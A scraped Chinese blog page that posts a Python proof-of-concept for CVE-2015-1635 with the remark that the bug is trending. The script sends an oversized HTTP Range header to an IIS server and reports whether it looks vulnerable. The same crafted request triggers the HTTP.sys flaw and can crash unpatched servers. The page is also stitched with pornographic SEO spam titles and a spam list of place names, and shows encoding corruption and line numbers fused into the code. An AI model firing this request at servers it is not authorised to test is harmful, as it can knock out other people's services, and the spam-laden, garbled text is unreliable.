国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 學(xué)院 > 開發(fā)設(shè)計 > 正文

cve-2015-1635poc

2019-11-14 17:16:15
字體:
供稿:網(wǎng)友
 1 import socket 2 import random 3 ipAddr = "10.1.89.20" 4 hexAllFfff = "18446744073709551615" 5 req1 = "GET / HTTP/1.0/r/n/r/n" 6 req = "GET / HTTP/1.1/r/nHost: stuff/r/nRange: bytes=0-" + hexAllFfff + "/r/n/r/n" 7 PRint("[*] Audit Started") 8 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 client_socket.connect((ipAddr, 80))10 client_socket.send(req1.encode())11 boringResp = client_socket.recv(1024).decode()12 if "Microsoft" not in boringResp:13                 print("[*] Not IIS")14                 exit(0)15 client_socket.close()16 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)17 client_socket.connect((ipAddr, 80))18 client_socket.send(req.encode())19 goodResp = client_socket.recv(1024).decode()20 if "Requested Range Not Satisfiable" in goodResp:21                 print("[!!] Looks VULN")22 elif " The request has an invalid header name" in goodResp:23                 print("[*] Looks Patched")24 else:25                 print("[*] Unexpected response, cannot discern patch status")
View Code

這個漏洞則這幾天也火了一把,poc附上。


發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 五台县| 吉林省| 于都县| 伊宁市| 铜陵市| 崇礼县| 泸定县| 卓资县| 韶山市| 噶尔县| 肥乡县| 祁门县| 海安县| 淮北市| 乌恰县| 庄浪县| 保山市| 大渡口区| 上栗县| 张家口市| 乐亭县| 兴化市| 兴和县| 巩留县| 六安市| 贡觉县| 屯昌县| 金昌市| 鄂伦春自治旗| 巴东县| 夹江县| 黔江区| 拜泉县| 绥中县| 乌兰县| 广德县| 枣庄市| 全州县| 崇信县| 深水埗区| 呼伦贝尔市|